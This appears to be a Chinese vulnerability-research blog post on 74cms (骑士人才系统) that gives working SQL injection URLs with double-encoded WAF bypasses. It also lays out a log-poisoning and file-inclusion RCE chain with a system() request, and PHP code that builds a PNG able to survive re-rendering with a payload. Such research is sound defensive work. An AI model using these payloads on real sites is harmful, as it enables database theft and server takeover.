某人才系统漏洞挖掘
j1ang 漏洞分析 6512浏览 · 2021-09-29 09:00

骑士人才系统漏洞挖掘

SE版的前台sql注入漏洞。

此漏洞仅仅影响 骑士CMS人才系统SE版

/application/index/controller/jobfairol.php 中存在如下方法

注意此处的 keyword。存在两次 url 解码,可以绕过很多的 waf,或者预处理。

先join 里一个数据表,然后添加排序,并指定分页后,调用 column() 方法。

这个方法也就是获取 sql查询某个列的数组。

并在该断点处,执行sql语句。

查看一下我们实际执行的sql语句。

我利用 union select 来达到时间盲注的效果。

payload:

http://localhost:1234/?s=index/jobfairol/resumelist&jobfair_id=1&keyword=123%252527))/**/union/**/select(sleep(5))%252523

如果开启了报错的情况可以报错注入。

http://localhost:1234/?s=index/jobfairol/resumelist&jobfair_id=1&keyword=123%252527))/**/union/**/select(updatexml(1,concat(0x7e,(select(user())),0x7e),1))%252523

v1_0/controller/home/jobfairol.php 也存在相同的方法。

基础版的前台RCE漏洞

基础版是通过 TP3.2.3 开发的,这个版本在应用初始化的时候,如果 APP_DEBUG 为false。

会将整个框架整合进 Application/Runtime/``common~runtime.php 文件中,后续的执行都在这个74kb,且只有一行代码的文件中。

强烈建议在个人调试的时候

将这里改成true。

Application/Common/Controller/BaseController.class.php

有这样一个方法。

Common应用里的控制器一般都是被当作基类存在的,无法直接通过 ?m=Common 直接去访问控制器里的方法。

但是他作为其他控制器的基类,而且又是 public 方法,我们依然可以调用他。

这几行不知道看官们熟不熟悉。

其实这个漏洞,可以追溯到某实验室发的漏洞通报

https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ?st=529DABB1BC6F651382C9135EB552827AD43F0288831BAC943C5A6CE32F45F1B9F423FD767BD30EB98F9C2C6D962C1268BBC7A694FE6B1157BC89FD16D8EAEB81A3BD642BDC08DB57567E4C7B327B7134882308F36A811B338901B511ABC8BC487356659B2CD0C8417DBCFD448DE79A0E6611FC7DAA7F5F806AED95180ADE0D979653805D9BE2818C36432C242C346C258EB569D4B4EC38ACD08C5E03A09D4FAA34F60913522071EB3BEEED7BDB667730296BE92C3B10E13BA48209051A216A1E&vid=1688851206182100&cst=53928845F30E881CE4702F30E4E78E655B605169B1BF71E0E963E97B3C21D4A26131701E074B2422DE3B7150338D0234&deviceid=de960c8d-258f-4e7d-a333-c1e3dc351b70&version=3.1.8.3015&platform=win

这是他们给出的漏洞样例。

其实大同小异,只不过fetch 只是获取输出页面的内容,但并不会显示出来。所以在这个cms中,如果可以rce,那也只是一个无回显的RCE。

简单概括他们的分析,就是将payload写进日志里,然后利用变量覆盖,造成任意文件包含,包含日志文件。

  1. 先发送恶意数据包
GET /index.php?m=--><?=system('calc');?><-- HTTP/1.1
Host: localhost:1234
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1

在 /data/Runtime/Logs/Common/ 中写入日志文件

  1. 然后构造payload去包含日志文件。
url:http://localhost:1234/index.php?m=home&c=AdvPersonal&a=assign_resume_tpl

post:
variable[_filename]=./data/Runtime/Logs/Common/21_09_22.log&tpl=adv_index

一开始并没有想到这个漏洞,我跟进了fetch 方法。

这里如果文件存在会直接返回,这显然是不合理的,在我们可以控制文件名的情况下。

这里的 loadTemplate 方法其实就是将文件中的内容获取出来然后写入模板缓存文件中,并返回缓存文件名。

然后变量覆盖,文件包含。

在我没有想到变量覆盖 _filename 的时候 ,我的思路很单纯,分析到这里想必都明白了。就是上传一个恶意文件,获取文件名赋给$tpl,最后tp解析模板后自动包含。

但后续也是遇到一些情况,比如前台的图片上传时会被二次渲染,恶意代码被和谐。又或者图片文件中存在一些可以被解析的标签,最后替换为不规则的php语法。

不过后来我用 png图片的二次渲染绕过了这个问题。

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>

当在修改简历处上传文件时,后面存在一个ajax请求,获取我们的图片,这样就暴露了图片的存储位置。

下面是缓存的图片文件。

这里的变量覆盖,可能因为先前某cms的前台rce的原因,我还是想找模板文件中存在的问题,但在这里,显然是走远了。

写在后面

tp3.2.x 的渲染模板处暴露出的两个显然存在的问题,一个变量覆盖造成的任意文件包含。需要有

作为前提。

另一个 is_file 判断后直接返回文件名,不考虑是否是模板文件。仅仅需要如下语句

配合文件上传就可以完成攻击。

还有一个就是 骑士cms的开发问题了,作为一个不想被直接调用的基类控制器,却存在一个任意模块的控制器都可访问的方法……

0 条评论
某人
表情
可输入 255